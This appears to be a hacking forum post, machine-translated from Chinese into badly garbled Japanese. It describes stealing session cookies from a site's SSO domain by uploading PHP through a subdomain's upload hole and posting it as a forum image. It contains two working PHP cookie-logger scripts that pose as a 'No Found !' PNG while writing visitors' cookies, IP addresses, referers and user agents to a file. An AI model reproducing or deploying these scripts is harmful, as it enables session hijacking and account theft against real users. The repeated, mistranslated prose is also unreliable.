sso役割ドメインはクッキーを盗んで局phpにまたがってpngプログラムコードを生成する
最近、ある大手サイトに浸透し、登録した後、sso技術であることがわかり、登録後、フォーラムなど、どの支局にも登録することができます.戦略が厳格ではないため、別の考え方の駅をまたぐ抜け穴がある.そのssoがクッキーに戻る役割ドメインは.abc.comは、以下のクッキーだけでアクセスできます.分析は以下の通り
abc.com下某分局hb.abc.comにはアップロードの抜け穴(linxu権限機械が死んで、大馬馬馬の馬の機能をアップロードするなど制限されている)があり、gdズボンがまだあるので、phpをアップロードしてクッキーを捕まえた.
phpはpngとして返され、クッキーをローカルフォルダに保持します.
そこで思い切ってその駅に立った.abc.comフォーラムは画像を発表して、住所は本プログラムの経路です.后ろのは淫らに言わない!
注意:ユーザーが駅をまたいでクッキーを受け取るプログラムではありません!
純粋なクロスステーションクッキーコード:
Set-Cookie: abcsession=2C521723E6C202D8648F14E9D93C319D; expires=Tue, 08-Nov-41 03:03:12 GMT; path=/; domain=.abc.com
abc.com下某分局hb.abc.comにはアップロードの抜け穴(linxu権限機械が死んで、大馬馬馬の馬の機能をアップロードするなど制限されている)があり、gdズボンがまだあるので、phpをアップロードしてクッキーを捕まえた.
phpはpngとして返され、クッキーをローカルフォルダに保持します.
そこで思い切ってその駅に立った.abc.comフォーラムは画像を発表して、住所は本プログラムの経路です.后ろのは淫らに言わない!
注意:ユーザーが駅をまたいでクッキーを受け取るプログラムではありません!
<?php
date_default_timezone_set("PRC");
header("content-type:image/png");
$img=ImageCreate(100,35);
$bgcolor=ImageColorAllocate($img,0,0,0);
$red=ImageColorAllocate($img,255,0,0);
$bgcolortrans=ImageColorTransparent($img,$bgcolor);
ImageString($img,5,10,10,"No Found !",$red);
ImagePng($img);
ImageDestroy($img);
$cookie="---------".date("Y m d G i s ")."---------
";
foreach ($GLOBALS[_COOKIE] as $key=>$v)
{
$cookie= $cookie.$key.'='.$v.";";
}
$cookie=$cookie."
IP : ".$GLOBALS[REMOTE_ADDR]."
";
$cookie=$cookie." : ".$_SERVER[HTTP_REFERER]."
";
$cookie=$cookie."----------------------------------------
";
$fp=fopen('cook.txt','at');
fwrite($fp,$cookie);
fclose($fp);
?>
純粋なクロスステーションクッキーコード:
<?php
date_default_timezone_set("PRC");
header("content-type:image/png");
$img=ImageCreate(100,35);
$bgcolor=ImageColorAllocate($img,0,0,0);
$red=ImageColorAllocate($img,255,0,0);
$bgcolortrans=ImageColorTransparent($img,$bgcolor);
ImageString($img,5,10,10,"No Found !",$red);
ImagePng($img);
ImageDestroy($img);
$cookie="---------".date("Y m d G i s ")."---------
";
$cookie.="Cookie :".$_SERVER[QUERY_STRING];
$cookie.="
IP : ".$GLOBALS[REMOTE_ADDR]."
";
$cookie.=" : ".$_SERVER[HTTP_REFERER]."
";
$cookie.=" : ".$_SERVER[HTTP_USER_AGENT]."
";
$cookie.="----------------------------------------
";
$fp=fopen('cookie.txt','at');
fwrite($fp,$cookie);
fclose($fp);
?>